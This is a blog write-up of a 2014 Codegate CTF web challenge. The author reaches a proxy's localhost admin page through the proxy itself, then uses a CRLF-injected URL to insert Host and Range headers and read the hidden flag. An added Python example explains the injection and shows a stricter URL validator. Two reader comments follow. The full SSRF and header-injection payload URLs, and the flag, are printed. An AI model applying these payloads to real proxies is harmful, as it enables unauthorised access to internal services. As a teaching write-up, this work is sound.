A disturbing lack of taste

24 Feb 2014

Codegate CTF Preliminary 2014 – Web Proxy Writeup

In this task a web proxy is given:

http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php

It has a GET parameter "url":

http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php?url=google.it

It prints the response headers plus part of the body. We can easily reach the admin page with:

http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php?url=localhost/188f6594f694a3ca082f7530b5efc58dedf81b8d/admin/

but since the body isn't printed in full, we can't see the whole response. After a bit of testing it turned out that a CRLF injection was possible, so we can read the body in slices by injecting a Range: header.

http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php?url=localhost/188f6594f694a3ca082f7530b5efc58dedf81b8d/admin/%20HTTP/1.0%0D%0AHost:%20localhost%0D%0ARange:%20bytes=372-425%0D%0AConnection:%20close%0D%0A%0D%0A

<!--if($_SERVER[HTTP_HOST]=="hackme")--></body>

Since it wants the Host header to be "hackme", let's do it:

http://58.229.183.24/188f6594f694a3ca082f7530b5efc58dedf81b8d/index.php?url=localhost/188f6594f694a3ca082f7530b5efc58dedf81b8d/admin/ HTTP/1.0%0D%0AHost:%20hackme%0D%0ARange:%20bytes=88-127%0D%0AConnection: close%0d%0a%0D%0A

Flag: WH0_IS_SnUS_bI1G_F4N

Razor4x
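Why the injected value works, and a stricter check a proxy could apply before building its request, as an added example that is not the challenge's code. The function names are hypothetical, the proxy's string-concatenation behaviour is an assumption, and the sample value is constructed with a shortened path.

```python
import ipaddress
from urllib.parse import unquote, urlsplit

# Constructed sample: same shape as the value in the writeup, shortened path.
INJECTED = ("localhost/admin/%20HTTP/1.0%0D%0AHost:%20hackme%0D%0A"
            "Range:%20bytes=88-127%0D%0AConnection:%20close%0D%0A%0D%0A")

def naive_request(url_param: str) -> bytes:
    """Assumed proxy behaviour: paste the decoded value into the request."""
    host, _, path = unquote(url_param).partition("/")
    return f"GET /{path} HTTP/1.0\r\nHost: {host}\r\n\r\n".encode()

def headers_seen_by_backend(raw: bytes) -> dict:
    """A server stops reading headers at the first blank line."""
    head = raw.split(b"\r\n\r\n", 1)[0].decode()
    fields = (line.split(":", 1) for line in head.split("\r\n")[1:])
    return {k.strip().lower(): v.strip() for k, v in fields}

def validate_target(url_param: str) -> str:
    """Hardened check: no whitespace/control bytes, no internal targets."""
    value = unquote(url_param)
    if any(c.isspace() or ord(c) < 0x20 or ord(c) == 0x7F for c in value):
        raise ValueError("whitespace or control character in url")
    host = (urlsplit("http://" + value).hostname or "").lower()
    try:
        ip = ipaddress.ip_address(host)
    except ValueError:
        ip = None  # a name; a real proxy must also check what it resolves to
    if not host or host == "localhost" or (
            ip is not None and (ip.is_loopback or ip.is_private)):
        raise ValueError("empty or internal target")
    return value

if __name__ == "__main__":
    # The proxy's own Host header lands after the blank line and is ignored.
    print(headers_seen_by_backend(naive_request(INJECTED)))
    for candidate in ("google.it", INJECTED, "127.0.0.1/admin/"):
        try:
            print("allowed:", validate_target(candidate))
        except ValueError as err:
            print("rejected:", err)
```

The literal-address check alone does not stop a public name that resolves to an internal address; the resolved address has to be checked at connect time as well.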

Comments (5) Trackbacks (0)
  1. Hello, I don't understand about HTTP/1.0, host:localhost, range=88-127, connection:close.
    Can you tell me what this is? I tried to hack it via LFI, but it couldn't show anything.
    P.S.: sorry for my English, I'm a beginner.

  2. How do you know the web proxy server agree the website consistent with specified HTTP header “range: bytes=” ?

